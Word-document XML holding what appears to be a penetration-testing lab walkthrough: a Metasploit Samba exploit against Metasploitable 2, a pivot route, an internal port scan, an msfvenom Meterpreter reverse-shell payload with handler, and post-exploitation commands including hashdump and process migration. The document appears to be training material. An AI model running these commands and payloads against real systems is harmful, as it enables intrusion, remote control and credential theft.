          <v:shape id="WS_Shape 749" type="Shape 749" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:233.91pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3843" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="381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Exploit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Samba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get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on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Metasploitable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2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3" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6089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use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exploit/multi/samba/usermap_script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1" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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RHOSTS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192.168.50.3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4" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="814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payload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cmd/unix/reverse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LHOST</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8599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192.168.50.2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6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exploit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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-j</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="2900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opened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(192.168.50.2:4444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-&gt;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192.168.50.3:xxxxx)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3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Upgrade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shell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3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for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pivoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8598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6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sessions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-u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1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19" w:after="19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2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opened</w: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50" coordorigin="1080,8460" coordsize="9373,10" o:spt="12" path="m1080,8465l10453,8465">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 750" type="Shape 750" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-4pt;mso-position-vertical-relative:paragraph;z-index:3847" filled="f" stroked="t" strokeweight="0.48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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="325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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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64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Add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Internal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Route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Pivot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81" coordorigin="1095,9876" coordsize="9363,3769" o:spt="12" path="m1095,9876l10458,9876l10458,13645l1095,13645">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 781" type="Shape 781" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:190.45pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:-251657461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86" coordorigin="1080,9876" coordsize="29,3769" o:spt="12" path="m1095,9876l1095,13645">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1086" type="Shape 1086" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:190.45pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3868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87" coordorigin="1080,9867" coordsize="9373,10" o:spt="12" path="m1080,9872l10453,9872">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1087" type="Shape 1087" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3869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88" coordorigin="10453,9867" coordsize="10,3779" o:spt="12" path="m10458,9867l10458,13645">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1088" type="Shape 1088" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:190.93pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3872" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="248" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="3240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Add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route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so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MSF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sends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internal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traffic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through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2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6435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use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post/multi/manage/autoroute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post(autoroute)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2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7456"/>
        <w:jc w:val="both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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>post(autoroute)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SUBNET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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10.10.10.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7456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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>post(autoroute)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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="3697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[+]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Route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added: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10.10.10.0/255.255.255.0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via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2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5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Verify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routing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table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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="19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route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print</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5177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Subnet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249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Netmask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02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Session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10.10.10.0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80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255.255.255.0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35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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>2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89" coordorigin="1080,13645" coordsize="9373,10" o:spt="12" path="m1080,13650l10453,13650">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1089" type="Shape 1089" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3876" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D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07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22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23" w:name="23"/>
    <w:bookmarkEnd w:id="23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188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7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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>3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59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Scan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9"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Internal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4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3" coordorigin="1095,1421" coordsize="9363,3121" o:spt="12" path="m1095,1421l10458,1421l10458,4542l1095,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 83" type="Shape 83" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:158.05pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:-251657496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9" coordorigin="1080,1421" coordsize="29,3121" o:spt="12" path="m1095,1421l1095,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 359" type="Shape 359" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:158.05pt;mso-position-horizontal-relative:page;margin-top:25pt;mso-position-vertical-relative:paragraph;z-index:3830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0" coordorigin="1080,1412" coordsize="9373,10" o:spt="12" path="m1080,1416l10453,1416">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 360" type="Shape 360" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:24pt;mso-position-vertical-relative:paragraph;z-index:3831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1" coordorigin="10453,1412" coordsize="10,3131" o:spt="12" path="m10458,1412l10458,4542">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 361" type="Shape 361" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:158.53pt;mso-position-horizontal-relative:page;margin-top:24pt;mso-position-vertical-relative:paragraph;z-index:3834" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="248" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4379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6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Port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scan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internal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Windows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target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through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pivot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6089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use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auxiliary/scanner/portscan/tcp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auxiliary(tcp)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0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8825"/>
        <w:jc w:val="both"/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RHOSTS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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>10.10.10.4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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>auxiliary(tcp)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</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="5748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PORTS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22,80,135,139,445,3389,5985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auxiliary(tcp)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run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6659"/>
        <w:jc w:val="both"/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[+]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10.10.10.4:445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-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TCP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[+]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10.10.10.4:135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7"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>TCP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OPEN</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4307"/>
        </w:tabs>
        <w:spacing w:before="24" w:after="0" w:line="191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[+]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10.10.10.4:3389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-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TCP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OPEN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5"/>
          <w:noProof/>
        </w:rPr>
        <w:tab/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(RDP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="191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2" coordorigin="1080,4542" coordsize="9373,10" o:spt="12" path="m1080,4547l10453,4547">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 362" type="Shape 362" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3838" filled="f" stroked="t" strokeweight="0.48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0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0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="326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0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0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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>4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59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21"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Generate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Windows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4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Payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="86" w:after="0" w:line="250" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360" w:right="972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staged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Meterpreter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reverse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TCP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payload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generated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using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msfvenom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delivered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Windows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target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through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pivot.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="32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97" coordorigin="1095,6799" coordsize="9363,2905" o:spt="12" path="m1095,6799l10458,6799l10458,9704l1095,9704">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 497" type="Shape 497" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:147.24pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:-251657470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61" coordorigin="1080,6799" coordsize="29,2905" o:spt="12" path="m1095,6799l1095,9704">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 861" type="Shape 861" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:147.24pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3855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62" coordorigin="1080,6789" coordsize="9373,10" o:spt="12" path="m1080,6794l10453,6794">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 862" type="Shape 862" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3856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63" coordorigin="10453,6789" coordsize="10,2914" o:spt="12" path="m10458,6789l10458,9704">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 863" type="Shape 863" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:147.72pt;mso-position-horizontal-relative:page;margin-top:16pt;mso-position-vertical-relative:paragraph;z-index:3859" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="175" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4726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Generate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Windows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reverse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payload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root@kali:~#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msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6088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-p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windows/meterpreter/reverse_tcp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LHOST=192.168.50.2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LPORT=5555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-f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exe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-o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payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="2100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[-]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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>No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platform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was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selected,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choosing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Msf::Module::Platform::Windows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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>[-]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No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arch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selected,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selecting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arch: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x86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from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the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payload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3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name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-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No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encoder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specified,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outputting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raw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payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="3127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Payload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size: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354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bytes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16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Final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size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of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exe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5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file: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73802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bytes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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Saved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4"/>
          <w:noProof/>
        </w:rPr>
        <w:t>as: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payload.exe</w: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64" coordorigin="1080,9704" coordsize="9373,10" o:spt="12" path="m1080,9708l10453,9708">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 864" type="Shape 864" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3863" filled="f" stroked="t" strokeweight="0.48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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="326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77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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5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64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Deliver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Payload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via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9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Pivot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93" coordorigin="1095,11125" coordsize="9363,3548" o:spt="12" path="m1095,11125l10458,11125l10458,14673l1095,14673">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 893" type="Shape 893" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:179.41pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:-251657445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42" coordorigin="1080,11125" coordsize="29,3548" o:spt="12" path="m1095,11125l1095,14673">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1242" type="Shape 1242" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:179.41pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3883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43" coordorigin="1080,11115" coordsize="9373,10" o:spt="12" path="m1080,11120l10453,11120">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1243" type="Shape 1243" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:388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44" coordorigin="10453,11115" coordsize="10,3558" o:spt="12" path="m10458,11115l10458,14673">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1244" type="Shape 1244" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:179.89pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3887" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="4495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up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handler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on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Kali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for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incoming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connection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13" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7116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use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exploit/multi/handler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exploit(handler)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5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payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6435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windows/meterpreter/reverse_tcp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4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exploit(handler)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9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LHOST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192.168.50.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7345"/>
        <w:jc w:val="both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exploit(handler)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  <w:t>set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LPORT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8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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>5555</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7345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msf6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exploit(handler)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exploit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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-j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Started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reverse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TCP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handler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on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192.168.50.2:5555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Transfer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payload.exe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Windows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target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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>via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Metasploitable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pivot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(SMB/HTTP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="274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45" coordorigin="1080,14673" coordsize="9373,10" o:spt="12" path="m1080,14678l10453,14678">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 1245" type="Shape 1245" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3891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23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24" w:name="24"/>
    <w:bookmarkEnd w:id="24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95,1090" coordsize="9363,2257" o:spt="12" path="m1095,1090l10458,1090l10458,3347l1095,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 58" type="Shape 58" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:114.83pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:-251657496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4" coordorigin="1080,1090" coordsize="29,2257" o:spt="12" path="m1095,1090l1095,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 304" type="Shape 304" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:114.83pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3826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5" coordorigin="1080,1080" coordsize="9373,10" o:spt="12" path="m1080,1085l10453,1085">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 305" type="Shape 305" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3827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6" coordorigin="10453,1080" coordsize="10,2266" o:spt="12" path="m10458,1080l10458,3347">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 306" type="Shape 306" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:115.31pt;mso-position-horizontal-relative:page;margin-top:17pt;mso-position-vertical-relative:paragraph;z-index:3830" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="345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Execute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on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Windows...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callback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received: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D4D4D4"/>
          <w:spacing w:val="-3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Sending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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>stage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D4D4D4"/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>10.10.10.4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="1757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session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3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opened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(192.168.50.2:5555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-&gt;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10.10.10.4:49xxx)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4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sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="381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-3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Computer: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DESKTOP-WIN10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22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OS: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Windows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10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(Build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19041)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getuid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Server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username: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DESKTOP-WIN10\User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7" coordorigin="1080,3347" coordsize="9373,10" o:spt="12" path="m1080,3351l10453,3351">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 307" type="Shape 307" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:8pt;mso-position-vertical-relative:paragraph;z-index:3834" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w: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240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0" w:after="0" w:line="325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</w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="229" w:after="0" w:line="229" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="360"/>
        <w:jc w:val="left"/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14"/>
          <w:noProof/>
        </w:rPr>
      </w:pP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8"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Step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36"/>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:eastAsia="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:color w:val="#4A5568"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="59"/>
          <w:noProof/>
        </w:rPr>
        <w:t>—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6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Post-Exploitation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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>on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4A5568"/>
          <w:b/>
          <w:bCs/>
          <w:spacing w:val="-17"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Windows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40" coordorigin="1095,4768" coordsize="9363,4413" o:spt="12" path="m1095,4768l10458,4768l10458,9180l1095,9180">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 340" type="Shape 340" style="position:absolute;left:0;text-align:left;margin-left:53.74pt;width:470.17pt;height:222.63pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:-251657474" filled="t" fillcolor="#1E1E2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6" coordorigin="1080,4768" coordsize="29,4413" o:spt="12" path="m1095,4768l1095,9180">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 676" type="Shape 676" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:3.44pt;height:222.63pt;mso-position-horizontal-relative:page;margin-top:27pt;mso-position-vertical-relative:paragraph;z-index:3858" filled="f" stroked="t" strokeweight="1.44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7" coordorigin="1080,4758" coordsize="9373,10" o:spt="12" path="m1080,4763l10453,4763">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 677" type="Shape 677" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3859" filled="f" stroked="t" strokeweight="0.48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8" coordorigin="10453,4758" coordsize="10,4422" o:spt="12" path="m10458,4758l10458,9180">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 678" type="Shape 678" style="position:absolute;left:0;text-align:left;margin-left:521.67pt;width:2.48pt;height:223.11pt;mso-position-horizontal-relative:page;margin-top:26pt;mso-position-vertical-relative:paragraph;z-index:3862" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="228" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6891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Gather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system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information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hashdump</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="8" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7116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6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Administrator:500:...:...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Guest:501:...:...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7347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Screenshot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of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desktop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C678DD"/>
          <w:spacing w:val="7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screenshot</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="552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-3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Screenshot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saved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to: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/tmp/kDNFp4jE.jpeg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Search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2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>for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7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sensitive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files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="7" w:after="0" w:line="210" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="8483"/>
        <w:jc w:val="left"/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00B4D8"/>
          <w:spacing w:val="0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3"/>
          <w:noProof/>
        </w:rPr>
        <w:t>search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-f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*.txt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-2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>-d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1AFEF"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>C:\\Users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="6891"/>
        <w:jc w:val="left"/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#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Migrate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0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stable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6A9955"/>
          <w:spacing w:val="-1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>process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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="1" w:after="0" w:line="215" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653" w:right="7912"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="#C678DD"/>
          <w:spacing w:val="5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ps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|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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>grep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-2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0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>explorer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"/>
          <w:noProof/>
        </w:rPr>
        <w:t>meterpreter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00B4D8"/>
          <w:spacing w:val="6"/>
          <w:noProof/>
        </w:rPr>
        <w:t>&gt;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migrate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10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C678DD"/>
          <w:spacing w:val="2"/>
          <w:noProof/>
        </w:rPr>
        <w:t>[PID]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="192" w:lineRule="exact"/>
        <w:ind w:firstLine="1" w:left="653"/>
        <w:jc w:val="left"/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</w:pP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[*]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Migrating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from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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>xxxx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to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1"/>
          <w:noProof/>
        </w:rPr>
        <w:t>yyyy...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-4"/>
          <w:noProof/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:color w:val="#FFD166"/>
          <w:spacing w:val="0"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Success.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-108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9" coordorigin="1080,9180" coordsize="9373,10" o:spt="12" path="m1080,9185l10453,9185">
            <v:stroke joinstyle="miter"/>
          </v:shapetype>
          <v:shape id="WS_Shape 679" type="Shape 679" style="position:absolute;left:0;text-align:left;margin-left:53.02pt;width:470.65pt;height:2.48pt;mso-position-horizontal-relative:page;margin-top:-2pt;mso-position-vertical-relative:paragraph;z-index:3866" filled="f" stroked="t" strokeweight="0.48pt" strokecolor="#00B4D8">
            <v:fill opacity="0"/>
          </v:shape>
          <w10:wrap type="none"/>
        </w:pic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7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24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25" w:name="25"/>
